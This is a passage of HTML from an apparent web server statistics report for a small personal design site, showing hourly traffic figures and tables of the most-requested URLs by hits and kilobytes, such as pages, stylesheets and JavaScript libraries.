ALIGN=right><FONT SIZE="-2">6.74%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.62%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>50</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1538</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.80%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>83</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2568</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.01%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>117</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.72%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>107</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>183</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5687</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.66%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>125</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>108</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.28%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>259</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>8028</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">9.39%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>84</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.82%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1104</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.29%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>90</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>79</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.33%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>183</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>5683</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.65%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>55</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.16%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>48</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>72</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2232</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.61%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.22%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>849</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.99%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.94%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.45%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>514</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.60%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>107</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.15%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>74</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.99%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.39%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>134</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4147</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">4.85%</FONT></TD></TR> <TR><TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.94%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>0</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.11%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>794</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.93%</FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPURLS"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=6>Top 17 of 48 Total URLs</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">URL</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>202</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1271</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/">/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>144</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">8.27%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>165</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.19%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/robots.txt">/robots.txt</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.39%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>748</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/usabilityEngineering.php">/gradWork/usabilityEngineering.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/css/jquery.galleryview-3.0-dev.css">/css/jquery.galleryview-3.0-dev.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>52</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.99%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>113</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.13%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/css/template.css">/css/template.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/script.js">/js/script.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>385</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/libs/jquery.galleryview-3.0-dev.js">/js/libs/jquery.galleryview-3.0-dev.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>65</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/libs/jquery.timers-1.2.js">/js/libs/jquery.timers-1.2.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>278</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.32%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/libs/modernizr-2.5.3.min.js">/js/libs/modernizr-2.5.3.min.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/plugins.js">/js/plugins.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.01%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/css/jquery.lightbox-0.5.css">/css/jquery.lightbox-0.5.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>91</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.11%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/libs/jquery.lightbox-0.5.min.js">/js/libs/jquery.lightbox-0.5.min.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>276</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.32%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/">/gradWork/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>209</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.24%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/usabilityTesting.php">/gradWork/usabilityTesting.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>223</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.26%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/ucd.php">/gradWork/ucd.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/favicon.ico">/favicon.ico</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/kinetic-v3.9.7.min.js">/js/kinetic-v3.9.7.min.js</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=6>Top 17 of 48 Total URLs By KBytes</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">URL</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>202</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1271</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/">/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.39%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>748</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/usabilityEngineering.php">/gradWork/usabilityEngineering.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>385</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/libs/jquery.galleryview-3.0-dev.js">/js/libs/jquery.galleryview-3.0-dev.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>278</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.32%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/libs/modernizr-2.5.3.min.js">/js/libs/modernizr-2.5.3.min.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>276</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.32%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/">/gradWork/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>223</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.26%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/ucd.php">/gradWork/ucd.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>209</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.24%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/usabilityTesting.php">/gradWork/usabilityTesting.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>144</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">8.27%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>165</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.19%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/robots.txt">/robots.txt</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>52</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.99%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>113</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.13%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/css/template.css">/css/template.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>91</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.11%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/libs/jquery.lightbox-0.5.min.js">/js/libs/jquery.lightbox-0.5.min.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>53</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/css/jquery.galleryview-3.0-dev.css">/css/jquery.galleryview-3.0-dev.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>46</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.64%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>65</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/libs/jquery.timers-1.2.js">/js/libs/jquery.timers-1.2.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.01%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/css/jquery.lightbox-0.5.css">/css/jquery.lightbox-0.5.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>39</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.05%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/kinetic-v3.9.7.min.js">/js/kinetic-v3.9.7.min.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.58%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/plugins.js">/js/plugins.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/favicon.ico">/favicon.ico</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>47</B></FONT></TD> <TD 